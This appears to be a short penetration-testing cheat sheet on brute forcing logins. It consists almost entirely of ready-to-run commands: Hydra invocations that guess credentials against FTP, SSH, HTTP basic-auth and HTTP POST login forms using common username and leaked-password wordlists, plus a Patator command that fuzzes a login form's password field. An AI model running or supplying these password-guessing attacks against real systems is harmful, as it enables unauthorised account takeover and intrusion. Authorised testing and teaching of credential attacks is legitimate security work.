Brute forcing
Hydra
FTP
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s PORT -o "ftp_hydra.txt" ftp://IP
SSH
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s PORT -o "ssh_hydra.txt" ssh://IP
HTTP-GET
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s PORT -o "http_auth_hydra.txt" http-get://IP/path/to/auth/area
HTTP-POST
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s PORT -o "http_form_hydra.txt" http-post-form://IP/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
Medusa
Patator
http-fuzz
patator http_fuzz url=https://URL:PORT/PATH method=POST body='user=admin&pass=COMBO00&sublogin=1' 0=/usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt after_urls=https://172.16.10.248:8081/dashboard.php accept_cookie=1 follow=1 max_follow=2 -x ignore:clen=5878
Last updated